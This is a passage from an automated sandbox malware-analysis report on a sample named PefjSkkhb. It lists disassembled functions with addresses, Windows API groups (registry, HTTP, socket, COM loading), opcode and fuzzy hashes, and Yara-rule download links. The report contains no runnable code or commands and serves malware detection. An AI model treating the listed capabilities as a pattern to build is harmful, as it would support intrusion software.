                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                • String ID: 2$P
                                                                                • API String ID: 93392585-1110268094
                                                                                • Opcode ID: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                                                • Instruction ID: defb361e75f8ae0c75df47e8fac2baac02383df3f5deb3cabdd2b677be403499
                                                                                • Opcode Fuzzy Hash: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                                                • Instruction Fuzzy Hash: B151D232A086C299F7B0BF759440BFDB7A1BB00B68FA44135CA1B52694CF3CD4A1A720
                                                                                Function 00007FF79F8EAD94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 70windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoad_invalid_parameter_noinfo
                                                                                • String ID: blank$info$question$stop$warning
                                                                                • API String ID: 4060274358-404129466
                                                                                • Opcode ID: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                                                • Instruction ID: 30c205e14b45b8ce0be70166576189a05e4dc7a0813ee54568ae0aa477a86be2
                                                                                • Opcode Fuzzy Hash: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                                                • Instruction Fuzzy Hash: D2217125B0C7D791F6B0BB35A900AF9E351AF54BA4FC44031DD4E46399EF7CE4629220
                                                                                Function 00007FF79F90FCC0 Relevance: 12.2, APIs: 8, Instructions: 246registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Close$BuffCharConnectDeleteOpenRegistryUpperValue
                                                                                • String ID:
                                                                                • API String ID: 50796853-0
                                                                                • Opcode ID: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                                                • Instruction ID: 612fd398c64f63f075cb643757126fd9a90ac5813846c3f59732f91ab240f9da
                                                                                • Opcode Fuzzy Hash: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                                                • Instruction Fuzzy Hash: 76B19E22B18A8286EB60EB75D4917FCA760FF85798F804431DA4E97B9ACF3CD155C720
                                                                                Function 00007FF79F9190A8 Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 3864802216-0
                                                                                • Opcode ID: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                                                • Instruction ID: 16e51974d8621e14c34a2960b51c91d3ebd3329f25742a3f4b2a1793296687f5
                                                                                • Opcode Fuzzy Hash: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                                                • Instruction Fuzzy Hash: C641AE366186C18BE734CB35B844BAABBA0F788BA5F504135EF8A47B58DF3CD4448B00
                                                                                Function 00007FF79F8B0BBC Relevance: 10.8, APIs: 7, Instructions: 294COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 3215553584-0
                                                                                • Opcode ID: c2757373dfb26c044112a110afa25e05e956175428925470acde8015b00b00d1
                                                                                • Instruction ID: d8fca30e2e882aea183c1f107f56b71549bf47f6483e315efdadc0e93d738eda
                                                                                • Opcode Fuzzy Hash: c2757373dfb26c044112a110afa25e05e956175428925470acde8015b00b00d1
                                                                                • Instruction Fuzzy Hash: 59C1C322A2C7C285EAB0AF369440AFDEB51FF40B91F954135DA4E073D5CE3CE861A721
                                                                                Function 00007FF79F8F09C4 Relevance: 10.7, APIs: 7, Instructions: 248COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                • String ID:
                                                                                • API String ID: 2550207440-0
                                                                                • Opcode ID: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
                                                                                • Instruction ID: 830cf2265ba7d08631c68c4fae2cc78a41a38d53134884ba64e62020ad99e3ed
                                                                                • Opcode Fuzzy Hash: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
                                                                                • Instruction Fuzzy Hash: 37A1C422A286824DFBA0AB75C446BFC6760EF54B55F954431CE0E87395DF7CD4A0E3A0
                                                                                Function 00007FF79F872100 Relevance: 10.7, APIs: 7, Instructions: 246COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                • String ID:
                                                                                • API String ID: 3225163088-0
                                                                                • Opcode ID: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                                                • Instruction ID: 57ef111487d9301efac29ec60cdd8bbe84a6a8ce687b74947124816d97098608
                                                                                • Opcode Fuzzy Hash: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                                                • Instruction Fuzzy Hash: 21A1BF72A1C6C087D7709F29A440BAEFB61FB85B94F904125EA8917B69CF3CD492CF10
                                                                                Function 00007FF79F91FB28 Relevance: 10.7, APIs: 7, Instructions: 212windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendWindow$Enabled
                                                                                • String ID:
                                                                                • API String ID: 3694350264-0
                                                                                • Opcode ID: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                                                • Instruction ID: 68771cfe9debb97ac328d65aa91a2ded706525a732396130e7a19d4502599f9c
                                                                                • Opcode Fuzzy Hash: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                                                • Instruction Fuzzy Hash: CA91A325F68ACE49FB74EB3194543F9A351AF867A8FC44032CA4D83699CF2CF4958360
                                                                                Function 00007FF79F8E9034 Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                • String ID:
                                                                                • API String ID: 87235514-0
                                                                                • Opcode ID: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                                                • Instruction ID: f4a1a588733d7b05f0f8806ed2dcc1992cd7204277bad2806cc3050933764efa
                                                                                • Opcode Fuzzy Hash: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                                                • Instruction Fuzzy Hash: 8451BF12A0D2D152FBB1BB715100BFEAFA0FB46BC4F898474DA8907B46CE6CE464D320
                                                                                Function 00007FF79F8E8E18 Relevance: 10.6, APIs: 7, Instructions: 145windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                • String ID:
                                                                                • API String ID: 87235514-0
                                                                                • Opcode ID: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
                                                                                • Instruction ID: 576b5bd581ad71e4c0e583d5ac34337b11fdc30784979de8ae671238714138cf
                                                                                • Opcode Fuzzy Hash: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
                                                                                • Instruction Fuzzy Hash: 12518062A0C2D255F7B1A7716501BFDAF61EB46BC4F888074DA8907E46CF1CE475A331
                                                                                Function 00007FF79F8FDBF0 Relevance: 10.6, APIs: 7, Instructions: 137networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
                                                                                • String ID:
                                                                                • API String ID: 3401586794-0
                                                                                • Opcode ID: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                                                • Instruction ID: dde1f67052d9802aceed773f2978c1ef16fb1ac342a37f9c60972a03e72aea6b
                                                                                • Opcode Fuzzy Hash: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                                                • Instruction Fuzzy Hash: 2251C5676086C18AF764EF32A901AEEA7A0FB58B88F944031DF0D17B44DF39D465D750
                                                                                Function 00007FF79F8E4860 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124comlibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: From$ErrorModeProg$AddressCreateFreeInstanceProcStringTasklstrcmpi
                                                                                • String ID: DllGetClassObject
                                                                                • API String ID: 668425406-1075368562
                                                                                • Opcode ID: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                                                • Instruction ID: d1d332c6178c31ae414b4e1ec0168f288db76c7c55501bd9e0c307c1bd84377d
                                                                                • Opcode Fuzzy Hash: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                                                • Instruction Fuzzy Hash: F351BC26B08BC682EB64BF26E9447B9A360FB44B94FA44034DB4D47A45DF7CE060D724
                                                                                Function 00007FF79F919248 Relevance: 10.6, APIs: 7, Instructions: 111windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: LongMessageSendWindow
                                                                                • String ID:
                                                                                • API String ID: 3360111000-0
                                                                                • Opcode ID: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
                                                                                • Instruction ID: af2359e050d7007dbea68830f5de34cb7b1698d7cbce514ce8e2c2ebe946fbf2
                                                                                • Opcode Fuzzy Hash: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
                                                                                • Instruction Fuzzy Hash: 89411225B15E8685EB70EB29D4946B9B350EBC4FA4F954131CA1E87BACCF2DE4458310
                                                                                Function 00007FF79F9037A8 Relevance: 10.6, APIs: 7, Instructions: 103networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 4170576061-0
                                                                                • Opcode ID: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
                                                                                • Instruction ID: 270282c797a4983d4ad47e6b6ea7084adc3bdf08fdb6214e13db0c838567e96a
                                                                                • Opcode Fuzzy Hash: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
                                                                                • Instruction Fuzzy Hash: 98418D22A086C282E770AF36A444AEDB360FB44BA4F954231DE6E87B99CF3CD545C710
                                                                                Function 00007FF79F91A884 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                • String ID:
                                                                                • API String ID: 161812096-0
                                                                                • Opcode ID: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
                                                                                • Instruction ID: d856b82cdeb807a023469f1447b150122e00290fc9593dbb8aa61fdc22dd7fa9
                                                                                • Opcode Fuzzy Hash: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
                                                                                • Instruction Fuzzy Hash: 00410736A04E8589EB60DF66D8806EC67A0FB44BA8BA54135DE4D87768CE38D885C760
                                                                                Function 00007FF79F9115C4 Relevance: 10.6, APIs: 7, Instructions: 90registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                • String ID:
                                                                                • API String ID: 395352322-0
                                                                                • Opcode ID: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                                                • Instruction ID: e50eefec86700a9594277500d2d8c21e4d594b417e5a4e9d3be28e0d9b59d198
                                                                                • Opcode Fuzzy Hash: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                                                • Instruction Fuzzy Hash: F2417132A18BC595E731DF21E4547FAA3A4FB897A8F840131EA4D8AA5CCF3DD149CB10
                                                                                Function 00007FF79F8E4FCC Relevance: 10.6, APIs: 7, Instructions: 76memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                • String ID:
                                                                                • API String ID: 3761583154-0
                                                                                • Opcode ID: 470201b7a7510a06dd913372f332e36f0e26382b67c565ba0de27237d0cac92a
                                                                                • Instruction ID: 1076066d36185efdcd42f783dc2b52e34b6790236d4c6f038e13e6d0a65ce121
                                                                                • Opcode Fuzzy Hash: 470201b7a7510a06dd913372f332e36f0e26382b67c565ba0de27237d0cac92a
                                                                                • Instruction Fuzzy Hash: 1A318321B08B8585DB74BF22E4446A9B3A0FB45FE0F898236EA5D47794CE3CE4549714
                                                                                Function 00007FF79F8E4EB0 Relevance: 10.6, APIs: 7, Instructions: 74memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: AllocByteCharMultiStringWide
                                                                                • String ID:
                                                                                • API String ID: 3603722519-0
                                                                                • Opcode ID: cf43f2be6eb4bd68818497ac57658916f6485d2528bb62b4acf40de2ec05e3b3
                                                                                • Instruction ID: b329eeeb4e96991a8256142af9949448977aed028c6efbc002c86dfbf2829d59
                                                                                • Opcode Fuzzy Hash: cf43f2be6eb4bd68818497ac57658916f6485d2528bb62b4acf40de2ec05e3b3
                                                                                • Instruction Fuzzy Hash: 2431C435A08B8589DB74BF22E8046E9F3A0FB44FA0F994236DA5D43794CF3CE4949710
